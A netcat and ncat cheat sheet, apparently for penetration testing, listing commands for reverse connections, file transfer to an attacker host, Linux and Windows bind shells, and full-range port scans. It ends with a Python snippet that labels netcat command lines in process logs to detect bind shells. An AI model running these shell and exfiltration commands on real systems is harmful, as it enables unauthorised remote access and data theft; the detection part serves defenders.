Shells and Files

Stage a verbose listener on the attack machine

nc -nvlp <Port>

Connect from the remote box back to the attack machine

nc <IP> <Port>

Receive a file on the attack box

nc -l -p <Port> > out.file

Send a file from the remote box

nc -w 3 <IP> <Port> < out.file

Set up a bind shell on the box

Linux

nc -v -e '/bin/bash' -l -p <Port> -t

Windows

nc -l -p <Port> -e "c:\windows\system32\cmd.exe"

Then telnet or nc to port <Port> from attack system to get the shell.

Network Utilities

Using netcat to make an HTTP request

echo -e "GET http://www.google.com HTTP/1.0\n\n" | nc -w 5 www.google.com 80

Making a one-page webserver; this will feed homepage.txt to all comers.

cat homepage.txt | nc -v -l -p 80

Check a UDP port

nc -vu <IP> <Port>

Scan UDP ports

nc -vzu <IP> 1-65535

To scan TCP ports, simply remove the -u

nc -vz <IP> 1-65535

Ncat

Make a secure shell listener (on Windows bind to cmd.exe, on Linux to /bin/sh)

ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl

Secure shell connector

ncat -v 10.0.0.22 4444 --ssl
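
Spotting these invocations in process-creation logs: the following is an added example, not part of the original cheat sheet. It labels netcat/ncat command lines by the flags used above (-l, -e/--exec, -z). The sample lines are constructed from the page's commands with placeholder values filled in, and the set of short options assumed to take a value is an assumption about traditional nc.

```python
import shlex

# Added example: triage of process-creation command lines (constructed samples).
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
EXEC_LONG = {"--exec", "--sh-exec"}      # ncat long options that attach a program
TAKES_VALUE = set("epswigGoq")           # assumed: short options followed by a value

def classify(cmdline):
    """Return None for non-netcat commands, else a label for the invocation."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keeps Windows backslashes
    except ValueError:                             # unbalanced quotes
        argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].strip("'\"").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return None
    listen = execs = scan = False
    for arg in argv[1:]:
        if arg.startswith("--"):
            name = arg.split("=", 1)[0]
            listen = listen or name == "--listen"
            execs = execs or name in EXEC_LONG
        elif arg.startswith("-"):
            for flag in arg[1:]:                   # bundled flags, e.g. -nvlp
                listen = listen or flag == "l"
                execs = execs or flag == "e"
                scan = scan or flag == "z"
                if flag in TAKES_VALUE:            # rest of the token is the value
                    break
    if execs:
        return "bind-shell" if listen else "exec"
    if listen:
        return "listener"
    return "scan" if scan else "client"

SAMPLES = [  # constructed; placeholders from the page filled with sample values
    "nc -v -e '/bin/bash' -l -p 4444 -t",
    'nc -l -p 4444 -e "c:\\windows\\system32\\cmd.exe"',
    "ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl",
    "nc -l -p 4444",
    "nc -vz 192.0.2.10 1-65535",
    "/usr/bin/curl -s http://example.com",
]

def triage(lines):
    """Pair each netcat command line with its label, skipping other processes."""
    return [(c, label) for c in lines if (label := classify(c)) is not None]

if __name__ == "__main__":
    for cmd, label in triage(SAMPLES):
        print(f"{label:10} {cmd}")
```

A "bind-shell" label (listen plus exec in one command line) is the combination worth alerting on; renamed binaries will not match on name and need hash- or behaviour-based coverage instead.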
